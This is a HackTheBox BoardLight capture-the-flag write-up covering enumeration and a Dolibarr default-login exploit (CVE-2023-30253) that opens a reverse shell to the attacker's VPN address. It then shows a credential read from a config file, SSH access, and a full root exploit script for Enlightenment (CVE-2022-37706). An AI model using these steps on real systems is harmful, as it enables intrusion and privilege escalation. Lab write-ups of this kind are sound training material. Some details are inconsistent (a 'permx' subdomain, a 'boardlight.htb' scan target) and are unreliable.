HackTheBox BoardLight Writeup
Explore the fundamentals of cybersecurity in the BoardLight Capture The Flag (CTF) challenge, an easy-level experience, ideal for beginners! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible and perfect for those new to CTFs.
Add Hosts
Edit the /etc/hosts file and add the following entries:
1
10.10.11.11 board.htb crm.board.htb
Script to add hosts automatically
1
2
3
ip="10.10.11.11"
domain="board.htb crm.board.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV boardlight.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-22 18:16 CEST
Nmap scan report for board.htb (10.10.11.11)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
While exploring the application at http://board.htb/contact.php, the footer reveals info@board.htb
This suggests the existence of the board.htb domain.
To enumerate subdomains, use ffuf with the following command:
1
ffuf -u http://FUZZ.board.htb -c -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
- Discovered Subdomains:
- crm.permx.htb: [Status: 200, Size: 6360, Words: 397, Lines: 150]
Accessing the CRM subdomain at http://crm.board.htb, you find a Dolibarr 17.0.0 instance.
Testing default credentials admin:admin is found
Exploitation of Dolibarr (CVE-2023-30253)
Using the CVE-2023-30253 exploit, which affects Dolibarr 17.0.0, you can gain access.
1
nc -lvnp 9001
1
2
3
4
5
6
git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
mv Exploit-for-Dolibarr-17.0.0-CVE-2023-30253 CVE-2023-30253
cd CVE-2023-30253
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
python3 exploit.py http://crm.board.htb admin admin $vpnip 9001
rm -rf CVE-2023-30253
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
1
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
1
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
1
export TERM=xterm;
Database Credentials
Next, check for database credentials by inspecting the configuration file:
1
cat /var/www/html/crm.board.htb/htdocs/conf/conf.php | grep 'db_'
SSH Access
With the found database password, log in as the user larissa:
1
ssh larissa@board.htb
Privilege Escalation (CVE-2022-37706)
During post-exploitation, LinPEAS identifies Enlightenment as a suid binary.
finding enlightenment suid exploit i found CVE-2022-37706
To exploit this, run the following script:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take a few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]; then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
Root Access
Once the privilege escalation exploit is successful, access the root flag:
1
cat /root/root.txt